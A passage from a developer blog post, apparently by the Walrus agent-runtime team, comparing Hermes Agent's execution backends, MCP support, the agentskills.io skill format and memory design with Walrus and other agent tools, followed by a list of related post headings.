This is a different philosophy from walrus's graph-based memory (LanceDB + lance-graph with Agent/User/Episode nodes). Hermes leans on procedural knowledge (skill docs) and user modeling (Honcho). Walrus leans on relational knowledge (graph traversal) and episode replay. Both aim for the same outcome — agents that remember — but the representations differ. We explored these tradeoffs in persistent agent memory research.

Six terminal backends

Hermes Agent separates the agent runtime from the execution environment. Six backends implement a common BaseEnvironment interface:

Backend	Use case	Key feature
Local	Development, personal use	Direct system execution, no isolation
Docker	Production, security-sensitive	Read-only root filesystem, dropped capabilities, PID limits, namespace isolation
SSH	Remote servers	Persistent environment across sessions
Daytona	Cloud development	Serverless dev environments
Singularity	HPC, research clusters	Container orchestration for compute-heavy workloads
Modal	Serverless production	Hibernates when idle, wakes on demand, near-zero cost between sessions

Configuration is a single line in ~/.hermes/config.yaml: backend: modal. The agent code doesn't change — only the execution surface.

MCP (Model Context Protocol) support is built in. The client connects at startup, discovers tools from configured servers, and registers them as first-class tools. Automatic reconnection uses exponential backoff (1s → 2s → 4s → 8s → 16s, max 5 attempts). Both stdio-based (local subprocesses) and HTTP-based (remote StreamableHTTP) servers are supported.

The agentskills.io standard

The most consequential part of Hermes Agent might not be the agent itself — it's the agentskills.io standard it follows for portable skills.

A skill is a directory containing a SKILL.md file with YAML frontmatter and markdown instructions:

---
name: deploy-to-production
description: Safely deploy the current branch to production with rollback support
license: Apache-2.0
---

## Steps

1. Run the test suite and verify all tests pass
2. Create a tagged release from the current branch
3. Deploy using the project's deploy script
4. Verify the deployment health check endpoint
5. If health check fails, trigger automatic rollback

The standard specifies minimal required fields (name, description), optional metadata, and an unrestricted markdown body (recommended under 5,000 tokens). Optional directories (scripts/, references/, assets/) support more complex skills.

What makes this significant: 11+ tools have adopted agentskills.io — Claude Code, Cursor, GitHub Copilot, Gemini CLI, VS Code, Amp, Goose, Roo Code, Kiro, Codex, and OpenCode. A skill written for Hermes Agent works in Claude Code. A skill written for Cursor works in Hermes Agent. This is rare in the agent ecosystem — most skill/plugin systems are framework-specific.

Walrus's approach is different: markdown skill files with YAML frontmatter and tag-based lookup across three tiers (builtin, user, project). The format is similar in spirit (markdown + metadata), but walrus skills are designed for the walrus runtime specifically, not for cross-framework portability. Whether agentskills.io becomes the universal standard or fragments into vendor-specific extensions is an open question — we discussed this in the context of our skills design philosophy.

How it compares

[Interactive chart — see original post]
| | Hermes Agent | Claude Code | OpenClaw | Walrus |
|---|---|---|---|---|
| Language | Python | TypeScript | TypeScript | Rust |
| Local inference | Ollama, vLLM, llama.cpp | No | No | Built-in |
| Memory | 5-level (FTS5, vector, Honcho, skills) | Session-based | Session-based | Graph + vector (LanceDB) |
| Skills | agentskills.io (11+ tools) | agentskills.io | Custom | Markdown + tags |
| Setup | pip + model server | Subscription + IDE | npm + API keys | Single binary |
| Backends | 6 (local, Docker, SSH, serverless) | IDE-embedded | Cloud gateway | Local process |
| Messaging | Telegram, Discord, Slack, WhatsApp, Signal | N/A | 20+ platforms | Telegram, Discord |
| Stars | 6.1K | N/A | 247K | Early stage |
| License | MIT | Proprietary | MIT | MIT |

The architectural divide is clear. Hermes Agent gives you the most flexibility: six execution backends, five memory layers, broad messaging support, portable skills. The cost is setup complexity — Python runtime, a separate model server (Ollama/vLLM), configuration files, and dependency management.

Walrus takes the opposite bet: one binary, built-in inference, zero external dependencies. Less flexibility, but the curl | sh to running-agent path is measured in seconds, not minutes. As we explored in how agents call agents, the framework's architectural choices cascade into everything from loop prevention to deployment patterns.

What the research says

The Hermes 3 technical report demonstrates that the 405B variant achieves state-of-the-art performance among open-weight models on several benchmarks. The function calling fine-tuning is particularly effective — the earlier Hermes 2 Pro achieved 90% accuracy compared to 60–70% for general-purpose models, a gap that Hermes 3 widened further.

The Hermes 4 report introduces the hybrid reasoning approach and validates it empirically: 78.4% reduction in overlong generation on AIME'24 with minimal accuracy cost. The DataForge pipeline's 60B-token synthetic dataset represents a bet that quantity and diversity of synthetic data, filtered by task-specific verifiers, outperforms smaller curated datasets.

A Render blog benchmark provides a striking finding: the same underlying model (Opus 4.5) achieves a 17-problem difference on SWE-bench depending on the agent scaffolding. Architecture matters more than model selection. This validates both Hermes Agent's investment in its ReAct loop + memory system and walrus's focus on runtime architecture — the model is necessary but not sufficient.

Honcho's user modeling approach (from Plastic Labs) represents an underexplored direction. Most agent memory systems focus on what the agent did (episodes, tool calls, outputs). Honcho focuses on who the user is — preferences, work patterns, domain expertise. Whether this produces meaningfully better agent behavior over time, or just accumulates an increasingly stale user profile, is an open empirical question.

Open questions

Does agentskills.io become the POSIX of agent skills? Eleven tools adopting the same standard is remarkable, but standardization has a history of fragmenting under pressure. When vendors need features the standard doesn't support (authentication, versioning, dependency management), do they extend agentskills.io or fork it? The SKILL.md format is deliberately minimal — which makes adoption easy but may make evolution hard.

Is Python + Ollama the right stack for local-first? Hermes Agent requires a Python runtime, a separate model server process, and configuration. This works for developers already in the Python ecosystem, but it's friction for anyone who isn't. A single binary that includes the inference engine (walrus's approach) removes an entire category of "it works on my machine" problems. The question is whether the flexibility of separate components outweighs the simplicity of a monolith.

Can autonomous skill creation actually compound? Hermes Agent's learning loop — complete tasks, create skills, improve skills during use — is the most ambitious memory system we've surveyed. But skills accumulate. Do old skills become stale? Do conflicting skills create confusion? Is there a pruning mechanism, or does the vector store grow unbounded? The agentskills.io standard says nothing about skill lifecycle management.

Does Honcho's user modeling outperform graph memory? Hermes models users as entities with derived facts. Walrus models relationships as graph edges with episode nodes. Both are persistent, both evolve. But they make different retrieval tradeoffs: Honcho retrieves user context ("this user prefers TypeScript"), walrus retrieves relational context ("last time this user asked about deployment, the agent used this approach"). Which produces better agent behavior at the 100-session mark?

DataForge's synthetic data pipeline: quantity vs quality? Hermes 3 used 390M tokens of curated data. Hermes 4 uses 60B tokens of DataForge-generated data — a 150x increase. The LLM judge provides quality filtering, but synthetic data can amplify biases present in the seed data. Does 60B tokens of synthetic data actually produce a better agent than 390M tokens of carefully curated data? The Hermes 4 benchmarks suggest yes, but the comparison isn't clean — the base model also changed (Llama 3.1 → ByteDance Seed).

Forem: CrabTalk

Workspace as sandbox: a simpler model for agent isolation

The model

Why zero sandbox logic in the runtime

The sandbox is the OS, not the code

Cross-platform for free

Pluggable setup, not pluggable runtime

walrus sandbox init

What init does NOT do

Without init

Sharing host resources

Project files: ACLs

Credentials: read-only ACLs

Browser profiles: copy into workspace

Listing and revoking

Where it breaks

Network isolation is separate

Process-level resources

The sudo prompt

Kernel isolation is shallow

The design principle

Prior art

Open questions

Further reading

Why we built OpenWalrus

The token tax

Security by neglect

Setup shouldn't be a project

The plugin marketplace gamble

How OpenWalrus is different

Tool permissions and the bash bypass problem

The bypass is not theoretical

The real-world damage

How frameworks handle it today

Two philosophies

The sandbox approach

The permission-model approach

What if there's only bash?

Arguments for bash-only

Arguments against bash-only

The middle ground: bash with capability declarations

What the research says

Implications for OpenWalrus

Open questions

Further reading

How AI frameworks control model thinking

The three approaches

API-parameter-controlled

Prompt and architecture controlled

Let it go

Framework-by-framework

Claude Code — from keyword hacks to adaptive thinking

Cursor — the user is the router

OpenClaw — seven thinking levels and a router

GitHub Copilot — reasoning controls are coming

Windsurf — model variants as reasoning levels

Aider — the most explicit controls

Devin — the black box

The landscape at a glance

What the research says

Open questions

Further reading

SOUL.md: brilliant idea, brittle implementation

What SOUL.md is

The adoption signal

What SOUL.md gets right

Five ways SOUL.md breaks

1. Silent loading failures

2. Subagent sessions don't load it

3. Compaction amnesia

4. Context window competition

5. Security attack surface

The measurement problem

The alternative: identity as graph

Open questions

Further reading

Plans vs tasks: how AI agents think before they act

Why planning matters

How five systems handle planning

Claude Code: plan mode + TodoWrite

`walrus sandbox init`